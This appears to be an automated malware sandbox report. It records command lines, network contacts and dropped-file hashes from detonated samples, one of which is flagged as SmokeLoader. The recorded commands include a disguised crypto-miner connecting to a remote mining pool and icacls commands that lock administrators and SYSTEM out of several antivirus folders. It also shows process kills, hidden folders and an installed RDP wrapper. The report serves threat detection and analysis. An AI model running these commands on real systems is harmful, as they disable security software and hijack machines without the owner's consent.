C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://185.139.69.167:3333 -u RandomX_CPU --donate-level=1 -k -t4

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 5 /NOBREAK

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM iediagcmd.exe /T /F

C:\Windows\SysWOW64\icacls.exe

icacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 3 /NOBREAK

C:\Windows\SysWOW64\icacls.exe

icacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM 1.exe /T /F

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM P.exe /T /F

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Program Files\360\Total Security"

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 stcubegames.netxi.in udp
UA 185.143.145.9:80 stcubegames.netxi.in tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 77.223.119.187:5655 rms-server.tektonit.ru tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 freemail.freehost.com.ua udp
UA 194.0.200.251:465 freemail.freehost.com.ua tcp
US 8.8.8.8:53 stcubegames.netxi.in udp
US 8.8.8.8:53 iplogger.org udp
UA 185.143.145.9:80 stcubegames.netxi.in tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
RU 109.248.203.81:21 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
RU 185.139.69.167:3333 tcp

Files

C:\Users\Admin\AppData\Local\Temp\aut7AF1.tmp

MD5 098d7cf555f2bafd4535c8c245cf5e10
SHA1 b45daf862b6cbb539988476a0b927a6b8bb55355
SHA256 01e043bc0d9a8d53b605b1c7c2b05a5ceab0f8547222d37edd47f7c5ccde191a
SHA512 e57b8a48597bf50260c0427468a67b6b9ee5a26fd581644cd53cef5f13dc3e743960c0968cb7e5e5dff186273b75a1c6e133d26ef26320fffabc36b249fbc624

C:\ProgramData\Windows\winit.exe

MD5 aaf3eca1650e5723d5f5fb98c76bebce
SHA1 2fa0550949a5d775890b7728e61a35d55adb19dd
SHA256 946b1c407144816c750e90cdf1bf253a4718e18b180a710b0408b4944e8f7d4f
SHA512 1cb6c141fc80a0c1015050e83c6e9e5787d2ac0240065cc656c3f2a7bacaa27c89347b7d03f227525f3895990bd6b14abcb3a5a95fcf20cd901a5da96965dd6b

C:\ProgramData\Windows\install.vbs

MD5 5e36713ab310d29f2bdd1c93f2f0cad2
SHA1 7e768cca6bce132e4e9132e8a00a1786e6351178
SHA256 cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931
SHA512 8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

C:\Programdata\Windows\install.bat

MD5 db76c882184e8d2bac56865c8e88f8fd
SHA1 fc6324751da75b665f82a3ad0dcc36bf4b91dfac
SHA256 e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a
SHA512 da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

C:\ProgramData\Windows\reg1.reg

MD5 0bfedf7b7c27597ca9d98914f44ccffe
SHA1 e4243e470e96ac4f1e22bf6dcf556605c88faaa9
SHA256 7e9541d21f44024bc88b9dc0437b18753b9d9f22b0cf6e01bb7e9bf5b32add9e
SHA512 d7669937f24b3dbb0fdfd19c67d9cdbd4f90779539107bd4b84d48eab25293ef03661a256fe5c662e73041b1436baff0570ace763fa3effa7c71d954378cbc2d

C:\ProgramData\Windows\reg2.reg

MD5 6a5d2192b8ad9e96a2736c8b0bdbd06e
SHA1 235a78495192fc33f13af3710d0fe44e86a771c9
SHA256 4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a
SHA512 411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

memory/5764-69-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5764-70-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5764-72-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5764-73-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5764-71-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5764-74-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5764-76-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4560-78-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4560-82-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4560-81-0x0000000000400000-0x0000000000AB9000-memory.dmp

C:\ProgramData\install\sys.exe

MD5 bfa81a720e99d6238bc6327ab68956d9
SHA1 c7039fadffccb79534a1bf547a73500298a36fa0
SHA256 222a8bb1b3946ff0569722f2aa2af728238778b877cebbda9f0b10703fc9d09f
SHA512 5ba1fab68a647e0a0b03d8fba5ab92f4bdec28fb9c1657e1832cfd54ee7b5087ce181b1eefce0c14b603576c326b6be091c41fc207b0068b9032502040d18bab

memory/4560-79-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4560-80-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4560-92-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4620-94-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4620-97-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4620-98-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4620-96-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4620-99-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5320-102-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5320-103-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5320-106-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5320-105-0x0000000000400000-0x0000000000AB9000-memory.dmp

C:\ProgramData\Windows\rfusclient.exe

MD5 b8667a1e84567fcf7821bcefb6a444af
SHA1 9c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256 dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512 ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

C:\ProgramData\Windows\vp8encoder.dll

MD5 6298c0af3d1d563834a218a9cc9f54bd
SHA1 0185cd591e454ed072e5a5077b25c612f6849dc9
SHA256 81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172
SHA512 389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

memory/5172-116-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5172-113-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5172-112-0x0000000000400000-0x00000000009B6000-memory.dmp

C:\ProgramData\Windows\vp8decoder.dll

MD5 88318158527985702f61d169434a4940
SHA1 3cc751ba256b5727eb0713aad6f554ff1e7bca57
SHA256 4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74
SHA512 5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

memory/5172-117-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3336-120-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/4620-124-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/3336-123-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3336-122-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3336-119-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3336-121-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5172-114-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3336-118-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5172-115-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5320-104-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5320-101-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4620-95-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4660-126-0x0000000000400000-0x0000000000420000-memory.dmp

memory/5320-130-0x0000000000400000-0x0000000000AB9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\autCA55.tmp

MD5 398a9ce9f398761d4fe45928111a9e18
SHA1 caa84e9626433fec567089a17f9bcca9f8380e62
SHA256 e376f2a9dda89354311b1064ea4559e720739d526ef7da0518ebfd413cd19fc1
SHA512 45255ffea86db71fcfcde1325b54d604a19276b462c8cca92cf5233a630510484a0ecb4d3e9f66733e2127c30c869c23171249cfac3bb39ff4e467830cd4b26b

memory/5172-141-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3336-142-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5380-144-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5380-149-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5380-148-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5380-147-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5380-146-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5380-145-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5380-151-0x0000000000400000-0x00000000009B6000-memory.dmp

C:\ProgramData\install\cheat.exe

MD5 0d18b4773db9f11a65f0b60c6cfa37b7
SHA1 4d4c1fe9bf8da8fe5075892d24664e70baf7196e
SHA256 e3d02b5bfcab47b86a2366ef37c3c872858b2e25ad5c5a4d1a5e49c2afaee673
SHA512 a607cf5d9dd1c7d8571a9e53fb65255b7c698c08e4f1115650ee08c476a0a7b75627a5b8cd93d8839a750def62dee465e6b947ecf4b875eda5d5e0cb9141a02c

C:\ProgramData\Microsoft\Intel\taskhost.exe

MD5 5cf0195be91962de6f58481e15215ddd
SHA1 7b2c9fbd487b38806ab09d75cc1db1cde4b6f6f6
SHA256 0b452348f0e900c8a09eb41529d2834dc2d113450a084bdb382ace73b9a75e6d
SHA512 0df9f28618f3d46fd515f89e4ef3bc93350cdf4f40132ccb903ca55ec8abda4f71f3ae0b29a4d62b4f49b9e0dbf13dba8cf0b6e24584c41c54ddda00898c86d4

C:\Programdata\RealtekHD\taskhostw.exe

MD5 73ca737af2c7168e9c926a27abf7a5b1
SHA1 05fd828fd58a64f25682845585f6565b7ca2fdb2
SHA256 99dec75b66a048341192c2baae3fe2c47fca801a21ca759bbb127908f97d11e2
SHA512 de42f9ef047b888da7379b685a3de7fa0935e3409d9d74bb67ea982dae78c21796985b6e5385875c157d715ee2909f72c419afa6e7c1e8632a8830ee3ea9c172

C:\Windows\SysWOW64\drivers\conhost.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\autEDDA.tmp

MD5 ec0f9398d8017767f86a4d0e74225506
SHA1 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512 d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

memory/5320-202-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/5116-205-0x00000000007E0000-0x00000000008CC000-memory.dmp

memory/3336-204-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5172-203-0x0000000000400000-0x00000000009B6000-memory.dmp

C:\ProgramData\Microsoft\Intel\R8.exe

MD5 ad95d98c04a3c080df33ed75ad38870f
SHA1 abbb43f7b7c86d7917d4582e47245a40ca3f33c0
SHA256 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd
SHA512 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

C:\rdp\run.vbs

MD5 6a5f5a48072a1adae96d2bd88848dcff
SHA1 b381fa864db6c521cbf1133a68acf1db4baa7005
SHA256 c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe
SHA512 d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c

C:\rdp\pause.bat

MD5 a47b870196f7f1864ef7aa5779c54042
SHA1 dcb71b3e543cbd130a9ec47d4f847899d929b3d2
SHA256 46565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba
SHA512 b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60

memory/5116-228-0x00000000007E0000-0x00000000008CC000-memory.dmp

C:\rdp\Rar.exe

MD5 2e86a9862257a0cf723ceef3868a1a12
SHA1 a4324281823f0800132bf13f5ad3860e6b5532c6
SHA256 2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8
SHA512 3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

C:\rdp\db.rar

MD5 462f221d1e2f31d564134388ce244753
SHA1 6b65372f40da0ca9cd1c032a191db067d40ff2e3
SHA256 534e0430f7e8883b352e7cba4fa666d2f574170915caa8601352d5285eee5432
SHA512 5e4482a0dbe01356ef0cf106b5ee4953f0de63c24a91b5f217d11da852e3e68fc254fa47c589038883363b4d1ef3732d7371de6117ccbf33842cee63afd7f086

C:\rdp\install.vbs

MD5 6d12ca172cdff9bcf34bab327dd2ab0d
SHA1 d0a8ba4809eadca09e2ea8dd6b7ddb60e68cd493
SHA256 f797d95ce7ada9619afecde3417d0f09c271c150d0b982eaf0e4a098efb4c5ec
SHA512 b840afa0fe254a8bb7a11b4dd1d7da6808f8b279e3bed35f78edcb30979d95380cfbfc00c23a53bec83fe0b4e45dcba34180347d68d09d02347672142bf42342

C:\rdp\bat.bat

MD5 5835a14baab4ddde3da1a605b6d1837a
SHA1 94b73f97d5562816a4b4ad3041859c3cfcc326ea
SHA256 238c063770f3f25a49873dbb5fb223bba6af56715286ed57a7473e2da26d6a92
SHA512 d874d35a0446990f67033f5523abe744a6bc1c7c9835fcaea81217dac791d34a9cc4d67741914026c61384f5e903092a2b291748e38d44a7a6fd9ec5d6bba87e

C:\rdp\RDPWInst.exe

MD5 3288c284561055044c489567fd630ac2
SHA1 11ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256 ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512 c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

memory/4660-262-0x0000000000400000-0x0000000000420000-memory.dmp

\??\c:\program files\rdp wrapper\rdpwrap.dll

MD5 461ade40b800ae80a40985594e1ac236
SHA1 b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

\??\c:\program files\rdp wrapper\rdpwrap.ini

MD5 dddd741ab677bdac8dcd4fa0dda05da2
SHA1 69d328c70046029a1866fd440c3e4a63563200f9
SHA256 7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668
SHA512 6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

memory/5320-270-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/3336-272-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/4288-275-0x0000000000400000-0x000000000056F000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5 1c0cf8684d41013e0925867166761c7a
SHA1 9524e385e849826dc043877b0afb4d6e8eda31c5
SHA256 b8661aa092f31eaac8538f277f91236f7d29a0584c5eb6e1674a6a246db7cd05
SHA512 fd285d8c87463fa34bc3c5b02ec31a20ccaf18be9d1a1ee42f404c62d4d2463a0de8ca66afcc3e9353a26ca5d99514942eea7d08e76ac0dfe01131adf20adcdb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

MD5 3ff7b392654e1b317109930965efb642
SHA1 2e0c1443b70144d86f142ca32b3017fa7c2ef265
SHA256 8d7626d9ecab01f2b0d5436db42a17eda8e0b2dd8306f5cc22b210c8ba37d6d4
SHA512 2f0155510f3f556b9a6bcdf9deb698afc4801e56d0b399c9ba264406d6ad7ef04aec4e08e4b39b6835a3dac7589efe8dce2713042338c8631a229c877ad5f410

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

MD5 60abd7b376910582392bf5896e2f5b61
SHA1 b81deecc59e56c32e5c36f8a739d627b7d402a3e
SHA256 5edbbcdee0a16baccefc513e15bbf9f2b5ca1dba861d0afbe704b6b26edeae5c
SHA512 78b0c49bff64d0dcd31966dd0bb42e5099a39a277d0fe1b61506417e1cb0f511044daed2f9d12e6568ef83610084ae98bf90f8b0dc16c45c5014518c10cb7290

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5 7143aa5e17d925354925d633f89b59b8
SHA1 ec2296a2cb3422d9c294e48cba497b419277cdb6
SHA256 667bac6cce827f155dc21906b80727fc9a04054d7b418c990061cfdbe97657b5
SHA512 51b7c2a31271d13bd047930361c1d2b625f243d3d193fd484d313d813819c4f4c22b5ac8537e461e3fead8104b7b5c04faa9ad8e34994c25a67501af3268c2d9

memory/2688-282-0x0000000000400000-0x000000000056F000-memory.dmp

memory/5320-299-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4660-302-0x0000000000400000-0x0000000000420000-memory.dmp

memory/5320-315-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/3336-317-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/2120-324-0x000001F4CE5E0000-0x000001F4CE5F0000-memory.dmp

memory/5320-353-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/3336-354-0x0000000000400000-0x00000000009B6000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

100s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Lonelyscreen.1.2.9.keygen.by.Paradox.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Lonelyscreen.1.2.9.keygen.by.Paradox.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Lonelyscreen.1.2.9.keygen.by.Paradox.exe

"C:\Users\Admin\AppData\Local\Temp\Lonelyscreen.1.2.9.keygen.by.Paradox.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

102s

Max time network

115s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0di3x.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0di3x.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\0di3x.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0di3x.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0di3x.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0di3x.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0di3x.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0di3x.exe

"C:\Users\Admin\AppData\Local\Temp\0di3x.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3424 -ip 3424

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 380

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
GB 88.221.135.25:443 www.bing.com tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

memory/3424-1-0x0000000003170000-0x0000000003270000-memory.dmp

